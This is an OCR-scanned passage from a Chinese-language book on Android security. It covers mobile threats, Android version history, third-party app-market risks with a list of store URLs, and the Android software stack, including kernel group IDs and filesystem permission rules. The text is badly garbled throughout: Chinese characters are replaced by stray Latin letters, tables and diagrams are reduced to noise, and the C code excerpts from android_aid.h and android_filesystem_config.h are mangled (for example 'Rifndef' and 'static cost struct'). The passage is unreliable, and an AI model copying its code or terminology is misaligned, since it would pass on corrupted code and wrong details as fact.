用 软件 市 场 。 对 用 户 来 说 ， 每 天 都 有 可 能 下 载 一 个 0. 99 美元 的 软件 。 这 时 ， 如 果 用 户 
经 常 从 软件 市 场 下 载 安装 应 用 程序 ， 他 将 很 难 注意 到 某 个 应 用 程序 的 行为 或 安全 性 。 

如 今 ， 人 们 越 来 越 多 地 使 用 自己 的 移动 设备 办 公 ， 而 不 愿意 使 用 公司 配 发 的 设 
备 。 越 来 越 多 的 Android 设备 和 iPhone 在 商业 环境 中 使 用 。 可 悲 的 是 ， 公 司 的 规章 制 
度 并 没有 跟 上 时 代 的 发 展 ， 还 是 更 多 关注 个 人 电脑 上 的 威胁 与 风险 ， 却 忽略 了 这 些 移 
动 设备 。 这 样 就 将 他 们 的 工作 环境 暴露 在 了 那些 利用 移动 设备 及 其 用 户 实施 的 攻击 之 
Fo 实际 上 ， 在 很 多 的 情况 下 ， 破 解 并 攻击 移动 设备 要 比 人 台式 电 脑 更 加 容易 ， 然 而 企 
业 却 仍然 把 大 把 的 钱 花 在 台式 电脑 的 安全 防护 上 。 威 胁 尚 未 出 现 ， 但 这 并 不 意味 着 就 
像 研究 人 员 或 企业 所 认为 的 那样 ， 不 存在 什么 太 大 的 风险 ， 这 类 威胁 可 能 来 自 那 些 国 
家 资助 的 机 构 ， 如 政府 情报 机 构 。 试 想 ， 如 果 将 这 些 攻击 运用 在 网 络 战 上 ,例如 ， 通 
过 传播 恶意 软件 ， 让 它们 阻塞 通信 媒介 ， 这 将 导致 整个 通信 网 络 的 瘫痪 。 


1.3 Android 概述 


Android 不 仅仅 是 一 个 操作 系统 ， 它 更 是 一 个 完整 的 软件 栈 。Android 基于 
Linux 内 核 ， 建 立 在 Linux 提供 的 系统 平台 之 上 ， 由 Google 公司 主导 的 OHA 负责 开 
发 。 本 节 将 简要 地 介绍 Android 系统 的 历史 、 版 本 发 布 和 典型 Android 设备 的 特点 。 


O “越狱 ”是 指 开放 用 户 的 操作 权限 ， 使 得 用 户 可 以 随意 控 写 任何 区 域 的 运行 状态 ， 只 有 越狱 成 功 后 iPhone 
的 文件 系统 才 处 于 可 读 写 (rw) 状态 ， 可 以 安装 和 运行 未 经 过 官方 认证 的 第 三 方程 序 、 插 件 。 一 一 译 者 注 
© root 是 计算 机 领域 术语 ， 在 UNIX 系统 (如 AIX, BSD 等 ) 和 类 UNIX 系统 (如 Debian, Redhat, 
Ubuntu 等 各 个 发 行 版 的 Linux) 以 及 Android 系统 中 ， 超 级 用 户 一 般 命名 为 root。 手 机 root 通常 是 针对 
Android 系统 的 手机 而 言 ， 它 使 得 用 户 可 以 获取 Android 操作 系统 的 超级 用 户 权 限 。root 通常 用 于 帮助 
用 户 越过 手机 制造 商 的 限制 ， 使 得 用 户 可 以 印 载 手机 制造 商 、 运 营 商 、 第 三 方 渠 道 商 预 装 在 手机 中 
某 些 应 用 ， 以 及 运行 一 些 需要 超级 用 户 权 限 的 应 用 程序 。Android 系统 的 root 与 Apple iOS 系统 的 
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Android 系统 并 不 是 在 Google 公司 诞生 的 ，2005 Æ Google 公司 收购 了 Android 
公司 ，2007 年 Google 公司 参与 创建 OHA。 那 时 ， 共 有 86 家 公司 共同 参与 创建 了 
OHA, Google 公司 选择 使 用 Apache 许可 证 开放 Android 7543, AOSP ( Android Open 
Source Project, Android 开源 项 目 ) 负责 维护 Android 源码 并 进一步 对 其 进行 开发 。 
主流 电信 公司 ， 像 HTC 公司 、LG 人 公司、 摩托罗拉 公司 和 高 通 公 司 都 是 OHA 的 成 
员 ， 该 组 织 致力 于 移动 设备 开放 标准 的 研发 。 而 Google 公司 领导 的 OHA， 则 负责 
实现 对 Android 平台 的 研发 和 维护 。 

Android 对 外 开放 系统 源码 ， 所 有 的 企业 都 可 以 目 由 地 使 用 该 系统 ， 因 此 
Android 系 统 是 企业 友好 的 。 只 要 遵循 Apache 2. 0 版 本 的 开源 许可 协议 ， 就 能 够 获 
得 并 使 用 Android 系统 的 源码 ， 而 要 获得 并 使 用 Linux 内 核 的 源码 则 需要 订 循 GNU 
2. 0 版 本 开源 许可 协议 才 可 以 。Android 系统 上 所 有 的 应 用 程序 都 是 平等 的 ， 虽 然 
在 系统 中 存在 内 置 的 浏览 器 ,但 用 户 仍然 可 以 自由 地 下 载 其 他 浏览 副 ， 如 火狐 、 
Opera 等 ， 这 些 浏览 器 同 内 置 浏览 器 在 地 位 上 是 一 样 的 ,用户 可 以 选择 目 己 的 应 用 
程序 替换 系统 中 内 置 的 应 用 程序 。 此 外 ， 出 于 对 授权 许可 的 考虑 ，Android 并 没有 
使 用 已 有 的 Java 虚拟 机 ， 而 是 开发 了 目 己 的 Dalvik 虚拟 机 。 

自从 最 原始 的 Android 版 本 发 布 以 后 ，Android 已 经 发 布 了 很 多 个 系统 版 本 ， 

一 个 版 本 都 修复 了 之 前 版 本 中 存在 的 一 些 漏洞 ， 增 加 了 一 些 新 的 功能 和 特性 。 版 
uv 顺序 以 甜点 名 称 命名 。 图 1.9 总 结 了 各 个 Android 发 布 版 本 及 其 特 
点 ， 图 1. 10 统计 了 现 有 设备 上 各 个 Android 版 本 的 占 比 。 


版 本 说 明 


Android 1.0 Android 1.0 版 本 是 2008 年 秋天 发 布 的 第 一 款 商业 Android 系 统 版 本 。 第 一 部 Android 
设备 是 HTC 生 产 的 搭载 了 Android 1.0 版 本 的 HTC Dream (G1) 。1.0 版 本 的 Android 
系统 的 主要 更 新 包括 : 系统 内 置 了 Android Market 应 用 程序 、 更 新 了 内 置 浏览 器 、 
支持 照相 机 功能 、 改 进 了 联系 人 应用 程序 、 上 日历、 聊天 程序 、 地 图 ， 以 及 搜索 功能 


Android 1.5 1.5 版 本 的 Android 系 统 基 于 2.6.27 版 本 的 Linux 内 核 

(Cupcake) 

Android 1.6 1.6 版 本 的 Android 系 统 基 于 2.6.29 版 本 的 Linux 内 核 ， 增 加 的 新 功能 包括 提升 的 语音 和 文 
(Donut) 字 搜 索 能 力 ， 支 持 WVGA 屏 幕 

Android 2.3 2 3 版 本 的 Android 系 统 优化 了 用 户 界面 ， 改 进 了 对 软 键 盘 的 支持 ， 提 升 了 游戏 性 能 ， 并 且 
(Gingerbread) 开始 支持 SIP 和 NFC 功 能 

Android 3.0 支持 更 大 的 屏幕 ， 引 入 了 对 多 核 处 理 器 、 diia 该 
(Honeycomb) 版 本 的 Android 系 统 主要 面向 平板 设备 

Android 4.0 


is Great M Android 3.0 版 本 的 功能 移植 到 智能 手机 上 ， 新 增加 了 面部 识别 解锁 功能 、 数 据 流 
Sandwich) 量 使 用 情况 监控 功能 和 社交 网 络 联系 人 整合 功能 


了 


图 1.9 Android 发 布 版 本 


10 





Android 系统 安全 与 攻防 


li Android 1.5 


8 Android 1.6 


三 Android 2.1 


i Android 2.2 
& Android 2.3 


& Android 2.3.2 


1.10 现 有 设备 上 Android 版 本 分 布 


Android 软件 栈 为 用 户 、 开 发 者 以 及 制造 商 提 供 了 很 多 特性 ， 其 中 主要 特性 如 


E] 1. 11 Brzn c 
特 性 
应 用 程序 框架 


Dalvik He £L 


Browser (浏览 器 ) 
Graphics 


说 明 


应 用 程序 框架 在 设计 上 提升 了 对 已 有 软件 /组 件 的 复 用 和 替换 


可 以 运行 dex 文 件 的 虚拟 机 ， 专 门 针 对 移动 设备 内 存 容 量 低 、 电池 
电量 有 限 的 特点 进行 优化 


基于 WebKait 引 擎 的 Android 浏 览 器 


Androld 的 图 像 显示 能 力 基于 Google 定 制 的 2D 图 像 库 的 支持 ， 
Android 3D Ed ($ ii W 3E-TOpenGL ES 1.0 版 本 API 支 持 


用 于 存储 和 处 理 数据 
支持 常见 的 音频 、 视 频 文 件 格式 
GSM 制 式 电话 功能 ， 蓝 牙 ，Wi-EFi 


基于 Eclipse(ADT) 提 供 的 功能 完善 的 开发 环境 ， 用 于 调试 、 测 试 和 
分 析 Android 应 用 程序 的 模拟 器 


1.11 Android 主要 特性 


1.4 Android 应 用 软件 市 场 


Android 应 用 程序 可 以 从 很 多 应 用 软件 市 场 下 载 安 装 。 虽 然 Coogle 公司 已 经 提 
供 了 最 大 的 Android 应 用 软件 市 场 ， 但 是 用 户 还 是 会 从 其 他 的 Android 软件 市 场 上 
下 载 应 用 ， 比 如 亚马逊 。 这 一 点 同 iPhone 的 应 用 软件 商店 模式 大 不 一 样 。 上 传 到 
Android 应 用 软件 市 场 的 应 用 程序 没有 经 过 严格 的 验证 或 安全 性 检查 ， 人 们 可 以 很 
容易 地 开发 一 些 恶意 软件 〈 例 如 伪装 成 当前 流行 应 用 软件 的 免费 版 本 ) ， 然 后 上 传 
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到 Google 公司 的 Android 应 用 软件 市 场 。 大 多 
数 情况 下 ， 这 些 软件 会 被 Google 公司 发 现 并 
删除 掉 。 然 而 ， 由 于 有 很 多 个 Android 应 用 软 
件 市 场 ， 因 此 ,仍然 会 有 一 些 使 用 其 他 
Android 应 用 软件 市 场 的 用 户 受 到 这 类 恶意 软 
件 的 影响 或 攻击 ， 如 图 1. 12 所 示 。 当 用 户 选 使 密码 可 多 
择 不 可 徘 的 软件 来 源 下 载 并 安装 应 用 程序 时 ， x cad 
这 种 情况 下 ，Google 公司 则 把 风险 转嫁 给 了 duis e MN 
用 户 。 这 不 是 一 个 理想 的 机 制 ， 至 少 应 该 像 I 
苹果 公司 一 样 ， 对 每 个 申请 发 布 的 软件 进行 anu 
安全 性 检查 ， 然 后 再 发 布 到 应 用 软件 市 场 上 。 € 

如 下 是 对 Android 应 用 软件 市 场 模式 存在 ES ES 
问题 的 归纳 : XT 

1) 即便 是 Google 公司 自己 的 Android 应 
用 软件 市 场 ， 也 没有 对 应 用 程序 进行 严格 详 图 1.12 ”安装 来 自 未 知 源 的 应 用 程序 
细 的 安全 性 审查 。 

2) 用 户 需要 目 行 验证 从 二 级 应 用 软件 市 场 上 获得 的 应 用 程序 ， 并 且 承 担 这 些 
应 用 可 能 存在 的 风险 。 

3) 特定 内 容 (如 成 人 内 容 等 ) 的 Android 应 用 程序 没有 对 不 同 用 户 群 体 进行 
验证 和 限制 就 能 被 下 载 并 安装 ， 如 拥有 手机 的 未 成 年 人 。 

表 1.1 展示 了 部 分 Android 应 用 软件 市 场 及 其 网 址 。 


表 1.1 Android 应 用 软件 市 场 





软件 市 场 名 称 mm 
Google Android Market https: //play. google. com/store * 
Amazon Appstore http: //www. amazon. com/b? node - 2350149011 * 
SlideMe http: //slideme. org/ + 
GetJar http: //www. getjar. com/ * 
Soc. io http: //soc. io/ * 
l Mobile http: //www. 1 mobile. com/ * 
Appbrain http; //www. appbrain. com/ * 
AppsLib http: //appslib. com/ * 
Handango http: //www. handango. com * 


http; //www. motorola. com/Consumers/US- EN/Consumer- Product- and- Services/ 
APPS/ App- Picks * 


Motorola 


GoA pk http: //bbs. anzhi. com/ * 
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( 续 ) 
软件 市 场 名 称 md 
Androidblip http://www. androidblip. com/ * 
AndroidPit http: //www. androidpit. com/ * 
Appoke http: //appoke. com/ * 
AppstoreHQ http: //www. appstorehq. com/ * 
BlapkMarket http; //blapkmarket. com/en/login/ * 
Camangi http; //www. camangimarket. com/index. html * 
Indiroid https: //indiroid. com/ * 
Insyde Market. http: //www. insydemarket. com/ * 
Appstoreconnect http: //appstoreconnect. com/publish/ * 
Mobihand http; //www. mobihand. com/ * 
Applanet http; //applanet. net/ * 
Handster http: //www. handster. com/ * 
Phoload http: //www. phoload. com/ * 
1.5 2h 


本 章 主要 介绍 了 近年 来 移动 设备 的 格局 以 及 在 数量 上 的 巨大 增长 ， 讨 论 了 
Android 系 统 的 占有 率 和 市 场 份额 。 目前 ， Android 已 经 成 为 智能 手机 和 平板 电脑 
(平板 电脑 方面 iPad 也 是 一 个 不 销 的 选择 ) 的 首选 系统 平台 。 随 后 ， 本 章 还 介绍 本 
移动 设备 安全 威胁 的 演变 ， 既 有 针对 应 用 程序 的 ， 也 有 涉及 蜂窝 技术 本 身 的 安全 威 
胁 。 最 后 ， 以 Android 应 用 软件 市 场 模式 作为 总 结 ， 探 讨 了 该 模式 对 Android 的 安 
全 性 可 能 存在 的 影响 。 总 之 ， 对 于 用 户 、 企 业 、 开 发 者 和 安全 专业 人 员 来 说 ， 
Android 的 安全 性 已 经 变 成 了 非常 重要 的 问题 。 从 第 2 章 开 始 ， 本 书 将 介绍 Android 
系统 的 基础 知识 ， 然 后 继续 讨论 Android 系统 的 安全 问题 。 


党 2 章 Android 体系 结构 


本 章 主 要 介绍 Android 的 体系 结构 ， 涵 盖 了 Android 软件 栈 的 各 个 层次 ， 从 
Linux 内 核 到 上 层 应 用 ， 以 及 各 个 层次 存在 的 安全 风险 的 程度 。 然 后 ， 引 导读 者 逐 
步 了 解 从 Android 的 局 动 过 程 到 Android 使 用 环境 下 的 各 种 设置 ， 展 示 了 Android 4X 
件 开 发 工具 包 (Software Development Kit，SDK) 提供 的 各 种 工具 。 最 后 ， 通 过 实 
践 演示 如 何 下 载 并 安装 Android SDK， 以 及 使 用 命令 行 shell 工具 同 Android 系统 进 
行 交 百 。 


2.1 Android 体系 结构 概述 


Android 系统 可 以 看 成 是 由 不 同 层 次 构成 的 软件 栈 ， 每 层 都 有 独自 的 功能 并 回 
上 层 提 供 特 定 的 服务 。Linux 内 核 居 于 软件 栈 的 最 底层 ， 其 上 是 本 地 库 和 Android 
运行 时 环境 (Dalvik 虚拟 机 与 核心 库 ) ， 再 上 一 层 是 应 用 程 
FERE, HFI Android 同 本 地 库 和 Linux 内 核 交 互 ， 应 用 程序 
最 上 层 是 Android 的 各 种 应 用 程序 。 以 下 是 各 层 的 详细 介 应 用 程序 框架 
绍 ， 图 2.1 摘 述 了 Android 软件 栈 的 层次 结构 ， 图 2.2 描述 
了 每 一 层 中 包含 的 组 件 。 


2.1.1 Linux 内 核 层 


Android 系统 的 Linux 内 核 位 于 Android 软件 栈 的 最 底 
E. 它 不 是 通常 所 见 到 的 传统 的 Linux 系统 (例如 
Ubuntu) ， 而 是 提取 了 传统 的 Linux 系统 的 内 核 代 码 ， 经 过 修改 和 优化 ， 使 其 更 加 
适合 在 嵌入 式 环 境 下 运行 。 因 此 ，Android 系统 的 Linux 内 核 不 具有 一 些 传统 的 
Linux 发 布 版 本 的 特性 ， 如 X 窗口 系统 、/bin 目录 下 的 一 整套 标准 GNU 工具 (B 
如 ，sed 等 工具 )， 以 及 一 些 系统 配置 文件 (如 存储 用 户 密码 的 /ete/shadow 文件 
等 )。 表 2.1 展示 了 Android 系统 版 本 和 其 基于 的 Linux. 内 核 版 本 的 对 应 关系 。 
Android 团 队 修改 了 传统 的 Linux 内 核 代 码 ， 从 而 形成 了 一 个 新 的 Linux 内 核 分 文 ， 
专门 用 于 和 佣 人 式 环境 。 该 Linux 内 核 分 支 由 Android 团队 负责 维护 ， 所 做 的 改动 主 
要 用 于 支持 今后 发 布 的 各 种 Android 系统 版 本 。 从 安全 性 的 角度 上 来 看 ， 这 么 做 征 
极为 重要 的 ， 因 为 针对 Linux 内 核 安全 的 改动 和 强化 一 直 都 在 持续 地 进行 ， 只 有 积 
极地 将 这 些 安全 优化 不 断 地 融 人 到 Android 系统 的 Linux 内 核 分 文 ， 才能 始终 让 用 
户 获得 最 佳 的 Linux 功能 。 





支持 库 和 运行 时 环境 


Linuxi 





[8] 2.1 Android 软件 
栈 层次 结构 
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”应 用 程序 


Home Contacts Phone Browser 


应 用 框架 


Window Content 视图 系统 


Activity Manager 
SOINS SS Manager Providers 


Telephony - Resource 2 : (MPP 
7: bi o0 E] ns " Jr " " a LI H L^ 
Package Manaper Manapa Manager 位 置 管理 XMPPIlN J 


标准 库 | Android 运 行 时 环境 
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+ 和 a M ^u RS T 2 
Surtace Manaper a NT 核心 库 
Framewüdárk 


ni a aT 


— NEPTIS UC MESMZTUS NM 


P å "i 


e » à 
-e aia d E— «mee, MI 2 08: :RE "A 


Limnux 内 核 


mS Ee ee ere td 


CEST T MAUKA "eya PES m es 
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raid 
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USB 驱 动 BRA 
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图 2.2 Android £(/F-F KK EARO 
X 2.1 Android 系统 版 本 与 Linux 内 核 版 本 对 应 关系 


Android 系统 版 本 Linux 内 核 版 本 
Android Cupcake 1. 5 Linux [Aj fZ 2. 6. 27 
Android Donut 1. 6 Linux 内 核 2. 6. 29 
Android Éclair 2. 0/2. 1 Linux [A] f£ 2. 6. 29 
Android Froyo 2. 2 Linux 内 核 2. 6. 32 
Android Gingerbread 2. 3. x Linux [f 2. 6. 35 
Android Honeycomb 3. x Linux [AZ 2. 6. 36 

Android Icecream Sandwich 4. x Linux P3fZ 3. 0. 1 


相 比 于 最 初 的 Linux Jf, Android 系统 的 Linux 内 核 分 支 已 经 加 入 了 很 多 的 改 
进 。 而 且 近 期 ，Linux 社区 决定 将 在 其 下 一 个 Linux 内 核发 布 版 本 ( 即 Linux. 内 核 
3.3 版 本 ) 中 融入 这 些 改进 。 | 

Linux 为 Android 系统 提供 了 坚实 的 底层 基础 ， 包 括 硬 件 抽象 、 驱 动 管理 、 安 全 
清理、 进程 管理 以 及 内 存 管理 等 多 种 功能 特性 。 其 中 ， 借 助 硬件 抽象 特性 ，Android 
可 以 移植 到 各 种 支持 设备 上 。 同 时 ，Linux 内 核 为 设备 厂商 提供 了 强大 的 设备 驱动 模 


O 图 片 资料 转自 网 络 : http: //en. wikipedia. org/ wiki/ Android. | operating_system ] 。 一 -一 原 书 注 
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型 ， 更 重要 的 是 ， 在 Android 软件 栈 中 还 增加 了 一 个 人 硬件 抽象 屋 。 该 驱动 模型 易于 理 
解 并 且 容 易 测试 ， 因 此 ， 很 多 常见 的 设备 驱动 可 以 直接 编译 到 Linux 内 核 中 ， 自 由 获 
得 并 查看 。 而 且 ， 专 门 有 一 个 活跃 的 软件 开发 社区 为 Linux 内 核 编写 驱动 程序 。 这 种 
做 法 主要 出 于 两 种 重要 考虑 ， 一 则 ， 使 Android 系统 可 以 广泛 地 文 持 大 量 的 设备 ， 尤 
其 对 于 平板 电脑 来 说 ， 这 一 点 更 为 重要 。 二 则 ， 信 助 这 种 多 于 理解 的 驱动 模型 ， 可 以 
让 设备 厂商 和 开发 者 更 容易 地 编写 设备 驱动 程序 。Android 系统 依赖 Linux 提供 的 基 
本 操作 系统 功能 ， 主 要 包括 IO、 内 存 管 理 和 进程 管理 等 。 图 2.3 显 示 了 Android 
2. 3. 3 版 本 系统 使 用 的 Linux 内 核 的 版 本 号 (使 用 cat/ proc/ version 命令 查看 ) 。 


pentestusri&tools-gibbons-vm-2:-$ adb shell 

# cat /proc/version 

Linux version 2.6.29-00261-90097074-dirty (digit&digit.mtv.corp.google.com) (gcc 
version 4.4.0 (GCC) ) 420 Wed Mar 31 09:54:02 PDT 2910 

E 





图 2.3 Linux 内 核 版 本 


从 安全 角度 上 来 看 ，Linux 为 Android 系统 提供 了 一 个 简单 但 安全 的 基于 用 户 
和 权限 的 安全 模型 。 而 且 ，Linux 内 核 还 为 Android 提供 了 进程 隔离 和 安全 的 IPC 
( Internet Process Connection ， 进 程 间 通信 ) 功能 。 同 时 ，Android 系统 已 经 精简 了 
Linux 内 核 ， 这 样 就 缩小 了 可 能 受到 攻击 的 范围 。 在 内 核 中 ， 每 个 Android 应 用 程 
序 作为 一 个 单独 的 用 户 和 进程 运行 ， 在 Linux 内 核 上 ， 基 于 用 户 的 权限 模型 不 允许 
应 用 程序 读 取 其 他 应 用 程序 的 信息 ， 或 是 干扰 其 他 应 用 程序 的 运行 (例如 ， 内 和 存 、 
CPU 、 其 他 设备 等 ) 。 出 于 对 安全 考虑 ，Android 对 Linux 内 核 做 出 了 一 定 的 改进 和 
增强 ， 例如， 根据 调用 进程 所 属 群 组 的 ID 限制 对 网 络 和 蓝牙 模块 的 访问 ， 该 功能 
通过 ANDROID_PARANOID_NETWORK 内 核 编译 选项 实现 。 只 有 特定 的 群 组 ID 能 
够 访问 网 络 或 蓝牙 模块 功能 。 这 些 群 组 定义 在 /include/linux/android_aids. h (该 文 
件 位 于 内 核 源 码 中 ) 文件 中 。 从 代码 段 1 可 见 ， 内 核 组 AID_INET 的 群 组 了 D 为 
3003 ， 只 有 成 为 该 群 组 成 员 的 进程 才能 建立 /打开 IPv4 和 IPv6 EE e 

/* include/linux/android  aid.h 


KJ 


Rifndef LINUX ANDROID AID H 
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define LINUX ANDROID AID H 


/* AIDs that the kernel treats differently */ 
#define AID NET BT ADMIN 3001 


#define AID NET _ BT 3002 

#define AID  INET 3003 

define AID NET RAW 3004 

define AID NET ADMIN 3005 

#define AID NET BW STATS 3006 /* read bandwidth 
statistics 

£f 


*define AID NET BW  ACCT 3007 /* change bandwidth 
Statistics accounting */ 
tendif 

代码 段 1 include/linux/android. aid. h 


— H ix £& DA fZ ZH fE/include/linux/android. aid. h 文件 中 定义 ， 就 会 被 映射 到 
/ system/ core/include/ private/ android, filesystem. config. h X fErHBJ3ES8ZH "inet" EF. 
下 面 的 代码 段 2 取 目 android filesystem. config. h X: fF, T Uim $82H 44 "inet" gek 
射 到 了 内 核 群 组 “AID_INET”， 且 和 群 组 ID 为 3003, 


static cost struct android id info android _ids[] = ( 


{ EO p AID S. ROOT, ), 

( "system", AID SYSTEM, }, 

( "radio", AID RADIO, ], 

( "bluetooth", AID BLUETOOTH, }, 
( "graphics", AID GRAPHICS, }, 
{ "input", AID ^ INPUT, } 

( "audio", AID AUDIO, }, 

( "camera", AID CAMERA, ], 

( “log”, AID LOG, ], 

( "compass", AID v COMPASS, }, 

{ "mount&, AID _ MOUNT, } ， 

( "wifi", AID WIFI, ), 

( "dhcp", AID (X DHGB p ky 

( “adb”, AID _ADB, ], 

( “install”, AID _ INSTALL, }, 

( "media", AID E MEDIA, }, 

( "drm", AID DRM, } 

( "available", AID AVAILABLE, ], 
(Brem AID MNEC, ), 

( Sdrmrpc", AID  DRMREC, }, 

( "shell", AID SHELL, }, 

( "cache", AID CACHE, ), 

{ 


“diag”, AID DIAG, }, 
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"net Bor 
anet.: bt 
“sdcard . 
"media ' 
"vpn", 
"keystore", 

“usb”, 

"mtp^, 

“gps”, 

“inet”, 
"net raw", 
net admin", 
“net bw stats", 
"ner bw acot', 
"misc", 

"nobody", 


wy 


rim pim pim pi pi pm a aM aM aa aa Dam D o Lon 


3 
代码 段 2 
当 Android 应 


admin", 


android | 


AID NET BT ADMIN, }, 
AID NET BT, te 

AID SDCARD RW, }, 
AID MEDIA RW, }, 

AID VPN, ], 

AID KEYSTORE, }, 
AID USB, ), 

AID MTE， 十; 

AID GPSi Je 

AID _ INET, ], 

AID NET RAM, }, 

AID NET ADMIN, ], 
AID NET BW STATS, ), 
AID NET BW ACCT, ), 
AID MISC, ], 

AID NOBODY, }, 


filesystem_ config. h 


应 用 程序 请 求 访 问 互 联网 时 ， 实 质 上 是 请 求 打 开 IPv4 和 IPv6 套 接 


字 的 权限 ， 通 过 /system/ etc/permissions/platform. xml 文件 将 应 用 程序 的 权限 映射 到 


64 * ,* 
inet 


逻辑 组 ， 继 而 映射 到 内 核 群 组 AID INET 上 。 下 面 的 xml 代码 段 用 于 实现 将 


应 用 程序 的 权限 映射 到 内 核 群 组 AID_INET。 


«permission name-"android.permission.INTERNET" > 


«group gid-"inet" 
«/permission» 


D 9 互联 网 访问 权限 的 应 用 程 厅 


te se 
S (sleeping) 


0 
10036 
10036 


10036 
10036 


10036 
10036 
; 256 
: 3003 
82888 ! 
82888 
Q 
18988 | 
18988 
11384 


/» 





行 时 详细 信息 如 图 2. 4 所 示 。 


10036 
10036 


图 2.4 获得 互联 网 访问 权限 的 应 用 程序 所 属 群 组 ID 为 3003 ( AID. INET) 
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从 安全 角度 来 看 ， 


= 


Dpentestusrietools-gibbons-vm-2: 


shell 
system 
root 
system 
system 
system 
root 
system 
system 
system 





与 攻防 


除了 把 内 核 群 组 ID 映射 成 逻辑 名 称 外 ， 还 有 男 一 个 重要 的 
安全 手段 ， 就 是 依 助 于 android_filesystem_config. h 文件 。 
文件 系统 所 有 文件 和 目录 的 所 属 规则 。 
户 和 AID_SYSTEM 群 组 ， 如 图 2. 5 所 示 。 

100771 ,AID SYSTEM, 


该 文件 中 定义 了 Android 


In", /data/app 目录 属于 AID. SYSTEM 用 
该 所 属 关 系 通 过 下 面 代码 实现 :; 
AID SYSTEM, 


" data/app' | 


2012-01-05 01:34 busybox 
2011-12-23 23:41 secure 
2011-12-23 23:49 misc 
2011-12-23 23:49 local 
2011-12-23 23:40 app-private 
2011-12-23 23:42 property 
2012-02-28 02:35 app 
2012-02-28 02:35 data 
2012-02-26 10:18 anr 
2011-12-23 23:40 dontpanic 
2012-02-28 02:35 dalvik-cache 
2012-04-29 04:18 backup 
2012-04-29 19:48 system 
2011-12-23 23:40 lost«found 


图 2.5 android filesystem. config. h 文件 定义 Adata 目录 的 拥有 者 为 system 


其 中 ， 第 一 个 字段 为 该 目录 的 访问 权限 RA 771) , 88 
别 为 拥有 者 的 用 户 ID 和 和 群 组 了 D， 最 后 一 个 字段 为 目录 路 径 。 
config. h 文 件 部 分 代码 段 如 下 所 示 ， 


static struct fs 


{ 00770, AID SYSTEM, 
{ 00771, AID SYSTEM, 
(00771, AID SYSTEM, 
(00771, AID SYSTEM, 
(00771, AID SYSTEM, 
(00777, AID  ROOT, 

(00755, AID  ROOT, 


Nu 


/* Rules for files. 


path 


-个 字段 和 第 三 个 字段 分 


android. filesystem _ 


config android dirs[] = ( 
AID CACHE, 


“cache” ), 


AID SYSTEM, "data/app" }, 
AID SYSTEM, "data/app-private" }, 
AID SYSTEM, "data/dalvik-cache" ], 


ATD. 


AID ROOT, 


SYSTEM, "data/data" ], 


"sdoard" -y, 


AID- ROOT O0 


** These rules are applied based on "first match", so they 
** should start with the most specific path and work their 
** way up to the root. 


© system 是 Linux 内 核 的 系统 用 户 。 一 一 译 者 注 


Prefixes ending in * denotes 
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wildcard 

** and will allow partial matches. 

zd 

static struct fs path config android files[] = ( 


( 00440, AID _ ROOT, AID SHELL, "system/etc/init. 
goldfish.rc^ .), 

( 00550, AID ROOT, AID SHELL, "system/etc/init. 
goldfish.sh" y; | 

{ 00440, AID ROOT, AID SHELL, “system/etc/init. 
trout. EC fa 


( 00550, AID _ ROOT, AID SHELL, "system/etc/init.ril" 


( 00750, AID ROOT, AID SHELL, "init*" ), 
( 00644, AID Àg ROOT, AID A ROOT, 0*3 
E 
代码 段 3 Android 系统 目录 及 文件 权限 


Android 内 核对 Linux 内 核 做 了 一 定 的 改进 ， 包 括 Binder IPC 机 制 、 电 源 管理 、 
闹钟 、 低 内 存 管理 器 和 日 志 系 统 等 特性 。 日 志 系统 功 能 在 整个 Android 系统 上 提供 
了 一 个 日 志 记 录 工 具 ， 通 过 logcat 命令 调用 。 在 本 章 后 面 的 Android 工具 一 节 中 将 


详细 介绍 logcat 命令 。 
2.1.2 标准 库 层 


Android 包含 一 组 C 和 C++ 文 持 库 ， 这 些 支 持 库 能 被 Android 系统 内 不 同 的 组 件 
使 用 ， 见 表 2. 2。 开 发 者 可 以 通过 应 用 程序 框架 层 使 用 这 些 支持 库 。 有 时 ， 本 层 也 被 
称 作 本 地 层 ， 这 是 因为 上 层 应 用 程序 层 和 应 用 程序 框架 层 的 代码 主要 使 用 Java 语言 
编写 ， 与 它们 不 同 是 ， 本 层 主要 采用 C 和 C++ 语言 实现 ， 并 针对 底层 硬件 做 了 代码 
性 能 优化 。Android 应 用 程序 可 以 使 用 JNI (Java Native Interface, Java 本 地 接口 ) 调 
用 这 些 支 持 库 提 供 的 函数 功能 ， 除 了 系统 C 库 (bionc), ， 大 部 分 的 支持 库 没有 什么 
改动 , 如 SSL、SOLite 等 。Android 的 系统 C 库 ， 也 称 为 bionic， 不 是 典型 的 libc FE, 
它 基 于 BSD 授权 许可 并 对 libe 库 进行 了 精简 ， 从 而 更 加 适用 于 垦 入 式 平台 。 


表 2.2 Android 本 地 层 库 


x 持 HB 说 明 
Media Libraries 基于 Packet Video Open Core, 支持 多 种 常用 音频 、 视频 格式 的 录制 和 回放 功能 
SQLite 为 应 用 程序 和 系统 提供 关系 型 数据 库 支 持 
SSL 提供 对 典型 加 密 功 能 支持 
Bionic 系统 C 库 ， 提 供 基 于 C 语言 的 系统 消 数 库 
WebKit Android 浏览 器 使 用 的 浏览 器 引擎 


Surface Manager 提供 对 显示 子 系统 的 支持 和 管理 
SGL 用 于 Android 的 底层 2D 图 形 引 擎 
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2.1.3 Android 运行 时 环境 


Android 运行 时 环境 由 两 部 分 构成 : Dalvik 虚拟 机 和 核心 库 。 使 用 Java 语言 编 
写 的 Android 应 用 程序 被 编译 成 Java 类 文件 (. class 格式 ) ， 但 是 Android 不 会 直接 
运行 这 些 类 文件 ， 而 是 将 这 些 . class 格式 的 类 文件 再 次 编译 成 Dex 格式 ， 然 后 再 交 
由 Android 平台 运行 。Dex 格式 的 文件 运行 在 一 个 类 似 于 Java 虚拟 机 (Java Virtual 
Machine, JVM) 的 定制 虚拟 机 上 ， 即 Dalvik 虚拟 机 。 典 型 的 Java 虚拟 机 和 Dalvik 
虚拟 机 的 编译 步骤 是 不 同 的 ， 两 者 之 间 的 区 别 如 图 2.6 所 示 。Dalvik 虚拟 机 基于 
Linux 内 核 提 供 更 底层 的 功能 ， 如 内 存 管理 。 


WENN n mem Dx15.clas 
hv 用 n HT A fi ^ Da xx (Fs iE MK. 
(Javali a Ef 


SX 
dex dex (ED VM 
T 运行 





应 用 程序 代码 


(Javak) 


aA IE I.class x (T classdEJVM'[rs fy 





图 2.6 Java 虚拟 机 (JVM) 和 Dalvik 虚拟 机 (DVM) 编译 过 程 对 比 


Android 包含 一 组 核心 库 ， 提 供 了 Java API (Application Programming Interface , 
应 用 程序 编程 接口 ) 中 的 大 部 分 功能 。 相 比 于 PSE，Android 核心 库 所 提供 的 API 
